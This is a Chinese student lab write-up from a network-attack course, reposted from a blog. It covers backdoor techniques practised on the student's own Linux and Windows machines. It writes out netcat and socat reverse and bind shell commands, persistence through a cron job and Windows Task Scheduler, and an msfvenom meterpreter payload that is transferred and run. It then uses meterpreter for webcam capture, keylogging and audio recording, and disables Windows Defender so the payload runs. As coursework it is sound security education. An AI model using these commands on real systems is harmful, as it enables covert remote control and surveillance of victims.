2018-2019-2 20165219《网络对抗技术》Exp2 后门原理与实践

2018-2019-2 20165219《网络对抗技术》Exp2 后门原理与实践

实验内容

使用netcat获取主机操作Shell,cron启动

使用Socat获取主机操作Shell, 任务计划启动

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

常用后门工具

Netcat参考资料

Socat参考资料

基础问题

例举你能想到的一个后门进入到你系统中的可能方式?

答:收到虚假邮件,下载邮件的附件

例举你知道的后门如何启动起来(win及linux)的方式?

答:通过修改注册表设置为开机自启动;进入挂马网站

Meterpreter有哪些给你映像深刻的功能?

答:开启摄像头,录制音频等操作。

如何发现自己有系统有没有被安装后门?

答:开启防火墙;下载专业的杀毒软件

实验过程
一 windows下获得一个linux shell

1 在Linux中使用ifconfig查看Linux的ip地址
1296533-20190324151826007-1023225545.png

2 在Windows中使用ipconfig查看本机ip地址
1296533-20190324151839475-1355445539.png

3 windowsncatexe -l -p 5219打开监听,Linuxnc ip 5219 -e /bin/sh反弹连接win,并且在Windows cmd查看是否成功

1296533-20190324151859902-1932374477.png
1296533-20190324151916282-909094630.png

二 Linux 下获得Windows的cmd程序

1 Linux运行监听指令nc -l -p 5219

2 Windows反弹连接Linuxncat.exe -e cmd.exe ip 5219
1296533-20190324152001534-1064758550.png

3 在Linux shell下使用dir命令
1296533-20190324152010555-2068779819.png

三 在Linux与Windows之间进行数据传送

1 在windows下输入命令:ncat.exe -l 5219,实现监听5219端口

2 Kali下输入ncat ip,连接到windows端口
1296533-20190324152042997-1483643528.png
1296533-20190324152134476-2020298429.png

四使用netcat获取主机操作Shell,cron启动

1 windows端下,输入命令ncat.exe -l -p 5219,监听本机的5219端口

2 kali端下,输入crontab -e,实现编辑一条定时任务。

3 插入* * * * /bin/netcat ip -e /bin/sh
1296533-20190324152230961-1645633341.png

4 保存退出,crontab -l查看
1296533-20190324152203323-767018528.png

五 使用socat获取主机操作Shell, 任务计划启动

1 win10系统中鼠标右击计算机:计算机管理->系统工具->任务计划程序->创建任务

2 填写任务名称:20165219
1296533-20190324152258416-1835427120.png

3 新建触发器
1296533-20190324152312791-1243547600.png

4 新建操作
1296533-20190324152326442-34053244.png

5 导入socat.exe的路径,并添加参数:tcp-listen:5219 exec:cmd.exe,pty,stderr(把cmd.exe绑定到端口5219,同时把cmd.exe的stderr重定向到stdout上)

6 锁定计算机,再次打开,运行任务。
1296533-20190324152341945-1609823842.png

7 在Linux shell中输入socat - tcp:ip:5219
1296533-20190324152400187-1013158933.png

六 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1 kali中输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=5219 -f exe > 20165219_backdoor.exe
1296533-20190324152454870-2132363546.png

2 Windows中使用ncat.exe -lv5219 > 20165219_backdoor.exe

3 Linux中输入nc ip < 20165219_backdoor.exe
在ncat文件夹下查看
1296533-20190324152519068-524816724.png

4 使用msfconsole进入msf控制台

5 进行一系列的设置
1296533-20190324152633260-1837171657.png

6 运行后门程序

七 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1webcam_snap可以使用摄像头拍照
1296533-20190324152656539-983237372.png

2 使用creenshot可以进行截屏
1296533-20190324152719234-1250119746.png

3 keyscan_start 记录下击键的过程
1296533-20190324152729805-694499288.png

4 record_mic可以截获一段音频
1296533-20190324152740293-151080577.png

八 遇到的问题

运行后门程序的时候, cMd拒绝访问,双击文件也不可以运行,关掉防火墙也不行 。

解决:把win10 控制面板中的 windows defender安全中心中的病毒威胁和防护功能关掉
1296533-20190324152748548-172566272.png

九 实验体会

通过这次实验明白了后门的原理。同时也增强了安全防护的意识,实验内容很有趣。

转载于:https://www.cnblogs.com/wyb-1998/p/10588406.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值